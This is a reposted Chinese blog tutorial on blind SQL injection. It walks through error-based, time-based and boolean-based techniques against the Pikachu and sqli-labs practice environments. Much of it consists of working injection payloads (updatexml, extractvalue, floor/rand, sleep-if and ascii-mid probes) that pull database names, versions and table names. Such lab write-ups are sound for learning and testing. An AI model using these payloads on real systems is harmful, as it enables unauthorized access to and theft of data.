SQL注入|盲注篇~

Posted 向阳-Y.

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入|盲注篇~相关的知识,希望对你有一定的参考价值。


盲注,顾名思义,就是注入时不能像其他注入时直接能看到返回值,但我们可以通过其他的方法进行判断:下面我将逐一介绍报错回显、时间盲注和布尔盲注。

盲注分为三类:

参考:
like ‘ro%’ #判断ro或ro… .是否成立
regexp ‘^abc[a-z]’ #匹配abc及abc…等
if(条件,5,0) #条件成立返回5反之返回0
sleep(5) #sQI语句延时执行5秒
mid(a,b,c) #从位置b开始,截取a字符串的c位
substr(a,b,c) #从b位置开始,截取字符串a的c长度 left(database(),1),database() #left(a,b)从左侧截取a的前b位 length(database())=8 #判断数据库database ()名的长度
ord=ascii ascii(x)=97 #判断x的asci i码是否等于97

1.举例SQL盲注-报错回显:

floor,updatexml,extractvalue

pikachu insert#

username=x' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e)))
from information_schema.tableslimit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
or '&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit

解释一下这里出现的username=x'
因为在查询中使用了如下sql
insert into member(username,pw) values(’xiaodi' order by 1’,md5(‘123’))
注:xiaodi后面的点是自己注入的,让它报错。
所以在实质测试中,应该把代码写在username=xiaodi’的后面

username=x' or updatexml(1,concat(0x7e,(version())),0) or
'&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit
username=x' or extractvalue(1,concat(0x7e,database())) or
'&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit

pikachu update#


上图是关于下面的注入写在哪个位置,只要有输入框的地方都能进行注入,但是submit这个提交按钮后面不能进行注入,还有在数字后面注入,数字可能不会加单引号,所以注入时按照情况判断是否加上单引号

sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or (select 1 from(select count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or '&email=wuhan&submit=submit 
sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or updatexml(1,concat(0x7e,(version())),0) or '&email=wuhan&submit=submit

这里放一张实际运用的截图

sex=%E7%94%B7&phonenum=13878787788&add=Nicky' or extractvalue(1,concat(0x7e,database())) or '&email=wuhan&submit=submit

pikachu delete#

/pikachu/vul/sqli/sqli_del.php?id=56+or+(select+1+from(select+count(*),concat(floor(rand(0)*2),0x7e,(database()),0x7e)x+from+information_schema.character_sets+group+by+x)a)
pikachu/vul/sqli/sqli_del.php?id=56+or+updatexml+(1,concat(0x7e,database()),0)
/pikachu/vul/sqli/sqli_del.php?id=56+or+extractvalue(1,concat(0x7e,database()))

2.举例SQL盲注-延时判断:

if,sleep
sleep可以控制返回数据的时间,例如sleep(5)表示5秒后才返回查询结果

select * from users where id=1 and sleep(5);

if,三目运算

select if(database()="a",123,456);  #如果database为a则返回123,反之返回456

结合写法:
判断数据库名是否等于abc,等于则5秒后返回结果,不等于则0秒返回结果

select * from users where id="1" and sleep(if (database()="abc",5,0));

实战sqlilabs延时盲注:

查询数据库名是否为security

http://192.168.56.217:8080/sqlilabs/Less-2/?id=1 and sleep(if(database()="security",0,5))

配合length判断数据库长度:
判断数据库名长度是否为8

192.168.56.217:8080/sqlilabs/Less-2/?id=1 and sleep(if(length(database())=8,0,5))

ascii()、mid(a,b,c)都是比较常用的
一般来说,推荐使用ascii的写法(ascii码表),也方便编程时采用for循环0-127跑一遍测值
判断数据库名第一个值是否为s开头

http://192.168.56.217:8080/sqlilabs/Less-2/?id=1 and sleep(if(ascii(mid(database(),1,1))=115,0,5))

综合运用举例:
判断第一排第一列的表名首字母是否为m,其中limit x,y表示第x行开始,查y行的数据【limit】

select * from users where id =1 and if(ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=109,sleep(3),sleep(0));

3.举例SQL盲注-逻辑判断(布尔):

regexp,like,ascii,left,ord,mid
判断database从左边第一位开始,到第二位的字符串是否为se

http://192.168.56.217:8080/sqlilabs/Less-2/?id=1 and left(database(),2)='se'

补充:12种报错注入+万能语句:
https://www.jianshu.com/p/bc35f8dd4f7c
其他推荐文章:
https://www.jianshu.com/p/fcae21926e5c

以上是关于SQL注入|盲注篇~的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入实战之盲注篇(布尔时间盲注)

SQL注入之盲注

基于错误信息的SQL盲注

墨者靶场 SQL注入漏洞测试(布尔盲注)

墨者靶场 SQL注入漏洞测试(布尔盲注)

基于错误信息的SQL盲注